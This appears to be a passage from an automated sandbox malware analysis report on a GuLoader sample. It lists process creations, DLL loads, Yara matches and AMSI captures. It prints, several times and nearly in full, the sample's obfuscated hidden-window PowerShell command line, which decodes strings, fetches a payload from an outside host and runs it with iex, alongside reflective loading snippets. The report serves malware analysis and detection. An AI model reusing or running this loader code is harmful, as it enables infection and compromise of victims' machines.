CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2263492849.0000000006FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2273423289.0000000009D8D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2268505302.00000000082A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Craniographer238)$global:Subgiant = [System.Text.Encoding]::ASCII.GetString($Eksploderings)$global:Mored162=$Subgiant.substring($Surmounting,$Spejle)<#Skinflintily Ergatomorphism Und
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tillukkede $Autoklaveringer $Andelskasse), (obliquely @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aktieavancebeskatnings = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dsedes90)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Revisionsprotokollers, $false).DefineType($Popul
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Craniographer238)$global:Subgiant = [System.Text.Encoding]::ASCII.GetString($Eksploderings)$global:Mored162=$Subgiant.substring($Surmounting,$Spejle)<#Skinflintily Ergatomorphism Und
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To 